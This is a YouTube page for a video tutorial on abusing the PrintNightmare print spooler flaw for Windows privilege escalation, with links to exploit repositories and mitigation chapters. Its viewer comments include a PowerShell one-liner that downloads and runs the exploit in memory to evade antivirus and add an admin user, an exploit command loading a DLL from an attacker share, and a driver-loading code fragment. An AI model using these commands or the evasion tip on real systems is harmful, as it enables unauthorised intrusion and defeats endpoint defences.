Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation

Published 2021-07-05
The exploit abuses the Windows Print Spooler to load malicious DLL files. This video shows how the exploit is used for local privilege escalation, along with how to mitigate these attacks. Check out the next video to see how this same vulnerability can be used for Remote Code Execution against a Domain Controller.

Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.


Github Resources mentioned in this video:
github.com/calebstewart/CVE-2021-1675
github.com/cube0x0/CVE-2021-1675

Part Two:
   • Abusing PrintNightmare RCE (CVE-2021-...  


00:00 - Intro
00:50 - Exploits on Github
02:50 - Reviewing Environment
05:40 - Running Exploit
10:00 - Mitigation

___________________________________________
Social Media:
Website: infinitelogins.com/
Twitter: twitter.com/infinitelogins
Twitch: www.twitch.tv/infinitelogins

___________________________________________
#CVE #PrintNightmare #WindowsVulnerability

All Comments (13)
  • @InfiniteLogins
    Part 2, showing Remote Code Execution against a Domain Controller, will be available today at 2 PM PDT. Check the link in the description!
  • @Dexterlex
    One thing I would like to see on your channel is AV evasion and stuff like that. Anyway, it's great to watch your videos.
  • @ARZ10198
    Nice explanation. Can the next video be about Kerberos delegation?
  • When you run the script, do you have the "Point and Print" GPO enabled? Thank you
  • @kientran9766
    When I tried to connect with user victim and password victim, it worked. However, when I tried to connect with a user that doesn't use a password, it didn't work. The command used: Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll ..... Now, I can't connect if the victim doesn't have a password.
  • @JSONSEC
    This isn't going to have any problems with YouTube censorship =p. Thanks for the videos though, I've been searching around for the PowerShell script for this.
  • @nexsploit4444
    Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up: iex(iwr https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe" :) hope that helps
  • @bugsysiegals
    Is this really your typing speed? How many words per minute are you typing? LOL
  • @bugsysiegals
    While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...
  • @sbypasser819
    Everyone says it works on all versions of Windows, BUT IT DOESN'T WORK ON WINDOWS 7! This: DRIVER_INFO_2W di = {}; di.cVersion = 3; di.pName = (LPWSTR)L"1111"; di.pEnvironment = (LPWSTR)L"Windows x64"; di.pDataFile = (LPWSTR)DLL_PATH; di.pConfigFile = (LPWSTR)DLL_PATH; di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL"; AddPrinterDriverExW(0, 2, (PBYTE) & di, 0); This gives error 5 on Windows 7; on Windows 10 before 21H2 it works.